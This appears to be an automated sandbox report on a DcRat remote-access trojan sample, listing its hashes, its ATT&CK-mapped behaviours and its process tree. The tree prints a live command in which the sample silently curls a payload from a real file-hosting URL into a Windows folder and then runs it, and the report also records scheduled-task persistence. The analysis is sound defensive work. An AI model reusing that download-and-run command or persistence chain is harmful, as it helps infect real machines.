dcrat | 2ee5d62e9112121eeb1c152fc6a0a5319c8ebfa30ab49eeecba49a6b945feefb

Analysis

max time kernel
148s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
15/01/2025, 01:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

private.exe
Size

854KB
MD5

9b76a571d37a4d6b4507642a85674cc9
SHA1

e2cf7359c93b5de6f08566b7457ae13ec47b9f3f
SHA256

2ee5d62e9112121eeb1c152fc6a0a5319c8ebfa30ab49eeecba49a6b945feefb
SHA512

a98b338aec862c78a56836d29903897343ac0987089e6252abe42b0212438f44525319d0d92811744f49c4b52a08a901866c20a4b9f39041aa8075837ebd1733
SSDEEP

12288:lu47xRm/JGQl6CwkoH7Fso6veRSN2ff+zOe9egX7AlGeyn2rnIr9BqiXb1FP:lu47SBR6CwkTo60OegX7Aoeyn4m7Vj

Score

10^/10

dcrat defense_evasion discovery infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4608	2824	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1704	2824	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3040	2824	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1944	2824	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4496	2824	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1648	2824	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5108	2824	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2156	2824	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4516	2824	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4068	2824	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3588	2824	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2112	2824	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4132	2824	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1088	2824	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1140	2824	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2044	2824	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3140	2824	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3416	2824	schtasks.exe	96

Downloads MZ/PE file

Checks computer location settings 2 TTPs 17 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe

Executes dropped EXE 16 IoCs

pid	Process
2284	client.exe
4868	chainreviewwinrefSvc.exe
2192	chainreviewwinrefSvc.exe
3184	chainreviewwinrefSvc.exe
1508	chainreviewwinrefSvc.exe
2948	chainreviewwinrefSvc.exe
4796	chainreviewwinrefSvc.exe
3292	chainreviewwinrefSvc.exe
2084	chainreviewwinrefSvc.exe
4676	chainreviewwinrefSvc.exe
2540	chainreviewwinrefSvc.exe
1464	chainreviewwinrefSvc.exe
2856	chainreviewwinrefSvc.exe
2880	chainreviewwinrefSvc.exe
2788	chainreviewwinrefSvc.exe
4780	chainreviewwinrefSvc.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\private.exe	chainreviewwinrefSvc.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\c119943affd730	chainreviewwinrefSvc.exe
File created	C:\Program Files\Java\jre-1.8\lib\winlogon.exe	chainreviewwinrefSvc.exe
File created	C:\Program Files\Java\jre-1.8\lib\cc11b995f2a76d	chainreviewwinrefSvc.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\apppatch\en-US\c119943affd730	chainreviewwinrefSvc.exe
File created	C:\Windows\Speech\client.exe	curl.exe
File created	C:\Windows\apppatch\en-US\private.exe	chainreviewwinrefSvc.exe
File opened for modification	C:\Windows\apppatch\en-US\private.exe	chainreviewwinrefSvc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	client.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 9 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4080	PING.EXE
1776	PING.EXE
4944	PING.EXE
3208	PING.EXE
744	PING.EXE
4684	PING.EXE
2192	PING.EXE
4128	PING.EXE
2372	PING.EXE

Modifies registry class 16 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	client.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	chainreviewwinrefSvc.exe

Runs ping.exe 1 TTPs 9 IoCs

Remote System Discovery

T1018

pid	Process
2372	PING.EXE
744	PING.EXE
4684	PING.EXE
2192	PING.EXE
1776	PING.EXE
4128	PING.EXE
3208	PING.EXE
4944	PING.EXE
4080	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1704	schtasks.exe
3040	schtasks.exe
1648	schtasks.exe
5108	schtasks.exe
2156	schtasks.exe
1140	schtasks.exe
3140	schtasks.exe
1944	schtasks.exe
4516	schtasks.exe
4068	schtasks.exe
2044	schtasks.exe
4496	schtasks.exe
3588	schtasks.exe
2112	schtasks.exe
3416	schtasks.exe
4608	schtasks.exe
4132	schtasks.exe
1088	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2360	private.exe
2360	private.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
4868	chainreviewwinrefSvc.exe
2192	chainreviewwinrefSvc.exe
2192	chainreviewwinrefSvc.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeDebugPrivilege	4868	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	2192	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	3184	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	1508	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	2948	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	4796	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	3292	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	2084	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	4676	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	2540	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	1464	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	2856	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	2880	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	2788	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	4780	chainreviewwinrefSvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2360 wrote to memory of 3196	2360	private.exe	84
PID 2360 wrote to memory of 3196	2360	private.exe	84
PID 2360 wrote to memory of 2812	2360	private.exe	85
PID 2360 wrote to memory of 2812	2360	private.exe	85
PID 2812 wrote to memory of 5008	2812	cmd.exe	86
PID 2812 wrote to memory of 5008	2812	cmd.exe	86
PID 2360 wrote to memory of 2960	2360	private.exe	88
PID 2360 wrote to memory of 2960	2360	private.exe	88
PID 2960 wrote to memory of 2284	2960	cmd.exe	89
PID 2960 wrote to memory of 2284	2960	cmd.exe	89
PID 2960 wrote to memory of 2284	2960	cmd.exe	89
PID 2284 wrote to memory of 3772	2284	client.exe	90
PID 2284 wrote to memory of 3772	2284	client.exe	90
PID 2284 wrote to memory of 3772	2284	client.exe	90
PID 2360 wrote to memory of 2580	2360	private.exe	91
PID 2360 wrote to memory of 2580	2360	private.exe	91
PID 3772 wrote to memory of 1860	3772	WScript.exe	104
PID 3772 wrote to memory of 1860	3772	WScript.exe	104
PID 3772 wrote to memory of 1860	3772	WScript.exe	104
PID 1860 wrote to memory of 4868	1860	cmd.exe	106
PID 1860 wrote to memory of 4868	1860	cmd.exe	106
PID 4868 wrote to memory of 1548	4868	chainreviewwinrefSvc.exe	125
PID 4868 wrote to memory of 1548	4868	chainreviewwinrefSvc.exe	125
PID 1548 wrote to memory of 2200	1548	cmd.exe	127
PID 1548 wrote to memory of 2200	1548	cmd.exe	127
PID 1548 wrote to memory of 1776	1548	cmd.exe	128
PID 1548 wrote to memory of 1776	1548	cmd.exe	128
PID 1548 wrote to memory of 2192	1548	cmd.exe	132
PID 1548 wrote to memory of 2192	1548	cmd.exe	132
PID 2192 wrote to memory of 4060	2192	chainreviewwinrefSvc.exe	134
PID 2192 wrote to memory of 4060	2192	chainreviewwinrefSvc.exe	134
PID 4060 wrote to memory of 4708	4060	cmd.exe	136
PID 4060 wrote to memory of 4708	4060	cmd.exe	136
PID 4060 wrote to memory of 4128	4060	cmd.exe	137
PID 4060 wrote to memory of 4128	4060	cmd.exe	137
PID 4060 wrote to memory of 3184	4060	cmd.exe	140
PID 4060 wrote to memory of 3184	4060	cmd.exe	140
PID 3184 wrote to memory of 4612	3184	chainreviewwinrefSvc.exe	142
PID 3184 wrote to memory of 4612	3184	chainreviewwinrefSvc.exe	142
PID 4612 wrote to memory of 4576	4612	cmd.exe	144
PID 4612 wrote to memory of 4576	4612	cmd.exe	144
PID 4612 wrote to memory of 1788	4612	cmd.exe	145
PID 4612 wrote to memory of 1788	4612	cmd.exe	145
PID 4612 wrote to memory of 1508	4612	cmd.exe	147
PID 4612 wrote to memory of 1508	4612	cmd.exe	147
PID 1508 wrote to memory of 2504	1508	chainreviewwinrefSvc.exe	149
PID 1508 wrote to memory of 2504	1508	chainreviewwinrefSvc.exe	149
PID 2504 wrote to memory of 3064	2504	cmd.exe	151
PID 2504 wrote to memory of 3064	2504	cmd.exe	151
PID 2504 wrote to memory of 2372	2504	cmd.exe	152
PID 2504 wrote to memory of 2372	2504	cmd.exe	152
PID 2504 wrote to memory of 2948	2504	cmd.exe	154
PID 2504 wrote to memory of 2948	2504	cmd.exe	154
PID 2948 wrote to memory of 2572	2948	chainreviewwinrefSvc.exe	156
PID 2948 wrote to memory of 2572	2948	chainreviewwinrefSvc.exe	156
PID 2572 wrote to memory of 4432	2572	cmd.exe	158
PID 2572 wrote to memory of 4432	2572	cmd.exe	158
PID 2572 wrote to memory of 216	2572	cmd.exe	159
PID 2572 wrote to memory of 216	2572	cmd.exe	159
PID 2572 wrote to memory of 4796	2572	cmd.exe	161
PID 2572 wrote to memory of 4796	2572	cmd.exe	161
PID 4796 wrote to memory of 1776	4796	chainreviewwinrefSvc.exe	163
PID 4796 wrote to memory of 1776	4796	chainreviewwinrefSvc.exe	163
PID 1776 wrote to memory of 4116	1776	cmd.exe	165

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\private.exe
"C:\Users\Admin\AppData\Local\Temp\private.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/Z01XJyuAz2yPo4d4/client.bin --output C:\Windows\Speech\client.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2812
- - C:\Windows\system32\curl.exe
    curl --silent https://file.garden/Z01XJyuAz2yPo4d4/client.bin --output C:\Windows\Speech\client.exe
    3⤵
    - Drops file in Windows directory
    PID:5008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\Speech\client.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2960
- - C:\Windows\Speech\client.exe
    C:\Windows\Speech\client.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:2284
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ComponentCrt\sBEZl9whlNx1coUjXXPbcOghFKEeD7haTOPQzUr4aUDA.vbe"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3772
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ComponentCrt\1lvoZv4qBcC2Me4L.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1860
      - C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt/chainreviewwinrefSvc.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4868
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\S4EXwJDwzg.bat"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1548
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:2200
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1776
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2192
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\htx2mBafAs.bat"
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:4060
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:4708
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4128
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3184
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\26i24I6rG0.bat"
        11⤵
        Suspicious use of WriteProcessMemory
        
        PID:4612
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        12⤵
        
        PID:4576
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        12⤵
        
        PID:1788
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1508
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5Fkn6foGzf.bat"
        13⤵
        Suspicious use of WriteProcessMemory
        
        PID:2504
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        14⤵
        
        PID:3064
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        14⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2372
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        14⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2948
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\XKxUoGu8Hi.bat"
        15⤵
        Suspicious use of WriteProcessMemory
        
        PID:2572
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        16⤵
        
        PID:4432
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        16⤵
        
        PID:216
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        16⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4796
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DK6554V6Uz.bat"
        17⤵
        Suspicious use of WriteProcessMemory
        
        PID:1776
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        18⤵
        
        PID:4116
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3208
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        18⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:3292
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\fPImnfbxm2.bat"
        19⤵
        
        PID:4440
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        20⤵
        
        PID:1352
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        20⤵
        
        PID:1348
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        20⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:2084
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\OEffu0Lctr.bat"
        21⤵
        
        PID:2220
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        22⤵
        
        PID:1944
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        22⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4944
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        22⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:4676
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Ot2Axq4KFg.bat"
        23⤵
        
        PID:3528
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        24⤵
        
        PID:1484
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        24⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:744
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        24⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:2540
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\rC9RFMHLq8.bat"
        25⤵
        
        PID:1952
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        26⤵
        
        PID:5016
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        26⤵
        
        PID:4204
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        26⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:1464
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ojUBGqHdSI.bat"
        27⤵
        
        PID:2144
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        28⤵
        
        PID:4604
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        28⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4684
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        28⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:2856
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GogtzRNUlL.bat"
        29⤵
        
        PID:776
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        30⤵
        
        PID:2408
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        30⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2192
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        30⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:2880
        
        C:\Windows\System32\cmd.exe
        
